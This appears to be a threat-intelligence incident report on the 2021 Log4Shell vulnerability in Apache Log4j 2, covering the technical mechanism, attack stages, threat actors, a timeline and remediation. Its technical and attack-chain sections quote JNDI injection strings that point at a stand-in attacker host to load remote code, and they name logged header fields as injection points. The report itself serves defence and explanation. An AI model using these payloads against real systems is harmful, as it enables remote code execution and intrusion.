TP-2021-0003 critical Under Review B

Log4Shell Vulnerability Mass Exploitation

Date December 9, 2021

Attack Type Supply Chain Sector Technology

Geography Global

Threat Actor Multiple threat actors

Attribution A4

CVEs CVE-2021-44228, CVE-2021-45046, CVE-2021-45105

Confidence B

Executive Summary

On December 9, 2021, the Apache Software Foundation disclosed CVE-2021-44228, a critical remote code execution vulnerability in Apache Log4j 2, an open-source Java logging library used by millions of applications and services worldwide. The vulnerability, dubbed “Log4Shell,” received the maximum CVSS score of 10.0 and allowed unauthenticated attackers to execute arbitrary code on any system running a vulnerable version of Log4j simply by causing the application to log a specially crafted string.

The scope of the vulnerability was extensive. Log4j 2 was embedded as a dependency in an estimated hundreds of millions of Java-based applications, including enterprise software from major vendors (VMware, Apache, Cisco, IBM, Oracle), cloud services (AWS, Azure, Google Cloud), and custom applications. The library was deeply nested in dependency trees, making it difficult for many organizations to determine whether they were affected.

Within hours of public disclosure, mass scanning and exploitation attempts were observed globally. CISA Director Jen Easterly described Log4Shell as “one of the most serious vulnerabilities that I’ve seen in my entire career, if not the most serious.” The vulnerability was exploited by a wide range of threat actors, from cryptocurrency miners and ransomware operators to nation-state espionage groups from China, Iran, North Korea, and Turkey.

Technical Analysis

The Log4Shell vulnerability resided in the JNDI (Java Naming and Directory Interface) message lookup feature of Log4j 2. When Log4j processed a log message containing a specially crafted string in the format ${jndi:ldap://attacker.com/payload}, the library would reach out to the specified LDAP (or RMI, DNS, or IIOP) server, retrieve a Java class file, and execute it within the context of the vulnerable application. This process occurred automatically during log message formatting, without any authentication or user interaction.

The attack was trivially exploitable. An attacker needed only to submit the JNDI lookup string as input to any field that the application would subsequently log — HTTP headers (User-Agent, Referer, X-Forwarded-For), form fields, API parameters, search queries, chat messages, or any other data that passed through the logging pipeline. The exploitation required no authentication, no special tools, and minimal technical skill.

The initial patch (Log4j 2.15.0) addressed the primary JNDI lookup vector but was found to be incomplete. CVE-2021-45046 was disclosed on December 14, revealing that the 2.15.0 fix could be bypassed in certain non-default configurations. A further vulnerability, CVE-2021-45105, was disclosed on December 18 in Log4j 2.16.0, allowing denial-of-service attacks. Log4j 2.17.0 was released on December 17 as the definitive fix.

The difficulty of remediation was compounded by Log4j’s presence as a transitive dependency — it was often included not directly in an application but through another library that depended on it. Organizations needed to conduct deep dependency analysis to identify all instances of vulnerable Log4j versions across their software portfolios. Some affected products were embedded systems, appliances, or legacy applications where updating a single library required vendor-supplied patches rather than direct remediation.

Attack Chain

Stage 1: Reconnaissance and Scanning

Beginning within hours of the public disclosure on December 9, attackers and security researchers conducted mass internet scanning to identify systems that would process and log JNDI lookup strings. Common scanning techniques included placing the exploit string in HTTP headers and monitoring for DNS callbacks.

Stage 2: JNDI Injection

Attackers submitted JNDI lookup strings (e.g., ${jndi:ldap://attacker.com/a}) as input to vulnerable applications through any logged input field. The exploit string was processed during log message formatting by the vulnerable Log4j library.

Stage 3: Remote Class Loading

The vulnerable Log4j instance connected to the attacker-specified LDAP server, which directed it to download and execute a malicious Java class file. This class file ran with the privileges of the application process.

Stage 4: Post-Exploitation

Depending on the threat actor, post-exploitation activities included: deployment of cryptocurrency miners (XMRig), installation of webshells and backdoors, deployment of ransomware (Conti, Khonsari), credential harvesting for lateral movement, or establishment of persistent access for espionage operations.

Impact Assessment

The Log4Shell vulnerability affected virtually every organization that operated Java-based applications. CISA estimated that hundreds of millions of devices were potentially vulnerable. The Apache Software Foundation reported that Log4j 2 was downloaded over 28 million times in the four months prior to the disclosure.

The remediation effort was one of the largest in cybersecurity history. CISA created a dedicated Log4j resource page and published a catalog of affected vendor products. The agency issued Emergency Directive 22-02 requiring federal civilian agencies to enumerate all internet-facing assets running Log4j and either patch or mitigate by December 23, 2021. Major cloud providers (AWS, Microsoft Azure, Google Cloud) issued advisories and patches for their managed services.

The economic cost of Log4Shell remediation was estimated in the billions of dollars globally, accounting for staff time spent identifying and patching vulnerable systems, incident response for compromised organizations, and the ongoing discovery of vulnerable systems months and years after the initial disclosure. A 2022 Cyber Safety Review Board (CSRB) report concluded that Log4j was an “endemic vulnerability” that would remain present in unpatched systems for a decade or more.

The incident prompted renewed focus on software supply chain security, software bills of materials (SBOMs), and the security of critical open-source infrastructure. Log4j was maintained primarily by a small group of volunteer developers, highlighting the disconnect between the critical role of open-source libraries and the resources available for their security maintenance.

Historical Context

Log4Shell was exploited by a wide spectrum of threat actors, making single-entity attribution inapplicable. Microsoft observed exploitation by nation-state groups they tracked as Hafnium (China), Phosphorus (Iran), and others. Mandiant reported exploitation by Chinese and Iranian state-sponsored groups targeting defense, government, and technology sectors. CrowdStrike observed North Korean and Turkish state-sponsored actors leveraging the vulnerability.

Financially motivated threat actors were also active. The Conti ransomware group developed a Log4Shell exploitation workflow within days of disclosure. Cryptocurrency mining operations deployed XMRig and other miners through Log4Shell on internet-facing servers. Botnet operators, including those behind the Mirai variant, incorporated Log4Shell into their automated scanning and exploitation toolkits.

The original vulnerability was reported to Apache by Chen Zhaojun of Alibaba Cloud’s security team on November 24, 2021. The public disclosure on December 9 was accelerated after proof-of-concept exploit code began circulating.

Attribution confidence is assessed as A4 (doubtful, referring to single-actor attribution) because the vulnerability was exploited by numerous independent threat groups across the full spectrum of motivations.

Timeline

2021-11-24 — Vulnerability Reported

Chen Zhaojun of Alibaba Cloud Security reports the Log4j JNDI injection vulnerability to the Apache Software Foundation.

2021-12-01 — Exploitation in the Wild Begins

Cloudflare and Cisco Talos later identify evidence of exploitation attempts dating back to at least December 1, before the public disclosure.

2021-12-09 — Public Disclosure and Patch

Apache releases Log4j 2.15.0 and CVE-2021-44228 is publicly disclosed. Within hours, mass scanning and exploitation begin globally.

2021-12-10 — CISA Advisory

CISA publishes its initial advisory on the Log4Shell vulnerability and begins coordinating the federal government response.

2021-12-14 — Patch Bypass (CVE-2021-45046)

A bypass of the 2.15.0 fix is discovered, leading to CVE-2021-45046. Apache releases Log4j 2.16.0.

2021-12-17 — Definitive Fix Released

Apache releases Log4j 2.17.0, addressing CVE-2021-45105 and providing a comprehensive fix.

2021-12-22 — CISA Joint Advisory

CISA, FBI, NSA, and international partners publish joint advisory AA21-356A with detailed mitigation guidance and indicators of compromise.

2022-07-14 — CSRB Report Published

The Cyber Safety Review Board publishes its review of the Log4Shell event, concluding that the vulnerability is “endemic” and will persist for years.

Remediation & Mitigation

The primary remediation was upgrading Log4j to version 2.17.0 or later. For applications where immediate upgrading was not possible, mitigations included: removing the JndiLookup class from the classpath (zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class), setting the system property log4j2.formatMsgNoLookups=true (effective for 2.10+), and blocking outbound LDAP/RMI traffic from application servers at the network level.

Organizations should maintain a software bill of materials (SBOM) to enable rapid identification of vulnerable dependencies. Dependency scanning tools should be integrated into CI/CD pipelines to detect vulnerable libraries before deployment. Network-level controls should restrict outbound connections from application servers to only necessary destinations, which would have limited the impact of JNDI-based exploitation.

The Log4Shell incident demonstrated the need for organizations to have mature vulnerability management processes that can respond to critical zero-day disclosures within hours. Asset inventory, dependency tracking, and rapid patching capabilities are essential for responding to vulnerabilities in widely-used open-source components. Organizations should also invest in runtime application protection (RASP) and web application firewalls (WAFs) as defense-in-depth measures against exploitation of known and unknown application vulnerabilities.

Sources & References

CISA: Apache Log4j Vulnerability Guidance (AA21-356A) — CISA, 2021-12-22
UK National Cyber Security Centre: Apache Log4j Vulnerability — NCSC, 2021-12-10
Microsoft: Microsoft’s Response to CVE-2021-44228 — Microsoft, 2021-12-11
Apache Software Foundation: Log4j Security Vulnerabilities — Apache Software Foundation, 2021-12-09